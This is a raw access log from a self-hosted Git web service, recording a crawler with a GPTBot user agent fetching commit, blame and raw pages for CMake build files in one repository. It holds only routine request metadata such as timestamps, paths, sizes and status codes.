"/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43102] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42452] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21635] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10089] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10089] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14255] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14256] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14035] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13307] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11189] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11170] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15265] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11189] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13308] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15263] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14252] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14034] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr 